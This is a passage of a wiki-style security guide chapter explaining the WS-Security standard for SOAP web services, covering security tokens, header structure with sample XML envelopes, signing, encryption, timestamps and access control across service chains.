* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
Flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols that are being developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standards are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens, passed in WSS messages, and ways of attaching them to the message may vary substantially. At the high level the WSS standard defines three types of security tokens, attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of those types is further specified in one (or more) profile document, which defines additional tokens' attributes and elements, needed to represent a particular type of security token. &lt;br /&gt;
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is providing tools for message-level communication protection, whereas each message represents an isolated piece of information, carrying enough security data to verify all important message properties, such as: authenticity, integrity, freshness, and to initiate decryption of any encrypted message parts. This concept is a stark contrast to the traditional channel security, which methodically applies pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data for higher level protocols. Those protocols, based on the standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard to detect problems, as is also discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents – one core document, which defines how security headers may be included into SOAP envelope and describes all high-level blocks, which must be present in a valid security header. Profile documents have the dual task of extending definitions for the token types they are dealing with, providing additional attributes, elements, as well as defining relationships left out of the core specification, such as using attachments.&lt;br /&gt;
&lt;br /&gt;
Core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section – see 0), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in the security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt; which specifies, how X.509 certificates may be passed in the BinarySecurityToken, specified by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WSS-Sec with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
WSS security specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc; and message data, i.e. everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, called Base64 encoding/decoding, which provides straightforward conversion from binary to ASCII formats and back. The example below demonstrates how binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver would know to apply the correct decoder to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message is used as a sort of an envelope around a letter – it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well, as the letter (SOAP message) should not know, nor should it care about its envelope (WSS Header), since the different units of information, carried on the envelope and in the letter, are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (for SOAP 1.1), or roles (for SOAP 1.2). Their contents may also be referring to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions/signature verifications, and should generally be avoided. WSS security header itself has a loose structure, as the specification itself does not require any elements to be present – so, the minimalist header with an empty message will look like:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
         &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
         &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
    &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Body&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
     &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, it must carry some information, which is going to help securing the message. It means including one or more security tokens (see 0) with references, XML Signature, and XML Encryption elements, if the message is signed and/or encrypted. So, a typical header will look more like the following picture: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... &lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;&lt;br /&gt;
         &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  &lt;br /&gt;
 	&amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:ReferenceList&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:ReferenceList&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:EncryptedKey&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
       &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
       &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
       &amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
       &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;&lt;br /&gt;
      &amp;lt;/wsu:Timestamp&amp;gt;&lt;br /&gt;
       &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;&lt;br /&gt;
 		...&lt;br /&gt;
 	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;&lt;br /&gt;
 		...									&lt;br /&gt;
             &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:Reference&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:SignedInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:KeyInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
         &amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
       &amp;lt;/dsig:Signature&amp;gt;&lt;br /&gt;
     &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
 	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
     &amp;lt;/xenc:EncryptedData&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms to pass username and, optionally, a password - the latter is described in the username profile document. Unless the whole token is encrypted, a message which includes a clear-text password should always be transmitted via a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or some other user directories, which do not return clear-text passwords), using a hashed version with nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing password hash: &lt;br /&gt;
&lt;br /&gt;
 Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )&lt;br /&gt;
&lt;br /&gt;
* Binary token&lt;br /&gt;
&lt;br /&gt;
They are used to convey binary data, such as X.509 certificates, in a text-encoded format, Base64 by default. The core specification defines BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle attachment of various tokens. Presently, both the X.509 and the Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;&lt;br /&gt;
         MIICtzCCAi...&lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based tokens, but primarily – for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
 	&amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens, passed in the message, or to identify signed and encrypted message parts, the core specification adopts usage of a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs should be unique within the scope of XML document where they are defined. Its application has a significant advantage for the intermediate processors, as it does not require understanding of the message’s XML Schema. Unfortunately, XML Signature and Encryption specifications do not allow for attribute extensibility (i.e. they have closed schema), so, when trying to locate signature or encryption elements, local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
&lt;br /&gt;
WSS core specification also defines a general mechanism for referencing security tokens via SecurityTokenReference element. An example of such element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;&lt;br /&gt;
             1106844369755&lt;br /&gt;
           &amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
 	&amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to pretty much any possible token type (including encryption keys, certificates, SAML assertions, etc) both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its possible four reference types – Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML, X.509 for instance) provide additional extensions to these mechanisms to take advantage of specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was already explained earlier (see 0), channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps addressing some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e. no Embedding or Embedded signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transformations defined by the XML Digital Signature WG at W3C, Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends using EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable with dereferencing a pointer to an object of specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows for references to signing security tokens through the STR mechanism (explained in 0), extended by token profiles to accommodate specific token types. A typical signature example is shown in an earlier sample in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as SOAP Body and the timestamp, as well as any user credentials, passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may follow (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element is pre-pended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message, using overlapping signature and encryption blocks, as there is nothing in this case that would point to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For its confidentiality protection, WSS relies on yet another standard, XML Encryption. Similarly to XML-dsig, this standard operates on selected elements of the SOAP message, but it then replaces the encrypted element’s data with a &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique key, which is then encrypted by the recipient’s public key and pre-pended to the security header in a &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with encrypted body is shown in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP messages’ freshness is addressed via timestamp mechanism – each security header may contain just one such element, which states, in UTC time and using the UTC time format, creation and expiration moments of the security header. It is important to realize that the timestamp is applied to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestampt” approach, since, once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in case of a legitimate change in the WSS Header.&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. There is no mechanism foreseen to address clock synchronization issue (which, as was already point out earlier, is generally not an issue in modern day systems) – this has to be addressed out-of-band as far as the WSS mechanics is concerned. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For more complete description of access control tasks, please, refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to have certain identity, which is expressed by attaching certain information to the message. This can be a username, an SAML assertion, a Kerberos ticket, or any other piece of information, from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors – credentials verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain user’s identity along with the proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining binding mechanism for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proof that the caller is who he claims to be is completely at the Web Service’s discretion. Whether it takes the supplied username and password’s hash and checks it against the backend user store, or extracts subject name from the X.509 certificate used for signing the message, verifies the certificate chain and looks up the user in its store – at the moment, there are no requirements or standards which would dictate that it should be done one way or another. &lt;br /&gt;
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has much broader scope. So, whatever policy or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services deployed as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define Java binding for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. Granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS is going to execute its access checks on the incoming HTTP calls before they reach the ASP.NET runtime, where SOAP message is going to be further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Services’ communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient details to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms to determine the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities, sort of WSDL on steroids. Through the published policy SOAP endpoints can advertise their security requirements, and their clients can apply appropriate measures of message protection to construct the requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types, one of them – for security, WS-SecurityPolicy.&lt;br /&gt;
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, both WS-Policy and WS-Trust specifications have not been submitted for standardization to public bodies, and their development is progressing via private collaboration of several companies, although it was opened up for other participants as well. As a positive factor, there have been several interoperability events conducted for these specifications, so the development process of these critical links in the Web Services’ security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business specific tasks, from taking the orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
This is in theory. In practice, there are a lot of obstacles hidden among the way, and one of the major ones among them – security concerns about publicly exposing processing functions to intra- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Services interaction – incompatible authentication and authorization models for users, amount of trust between services themselves and ways of establishing such trust, maintaining secure connections, and synchronization of user directories or otherwise exchanging users’ attributes. These issues will be briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust between client and service, they have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it is not scalable for open service models, and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as users’ population tends to change frequently among different domains. So, how does a service in domain B decide whether it is going to trust user’s claim that he has been already authenticated in domain A? There exist different aspects of this problem. First – a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means), and authentication tokens from one domain are acceptable in another. In Web Services world, this would be accomplished by passing around a SAML or Kerberos token for a user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
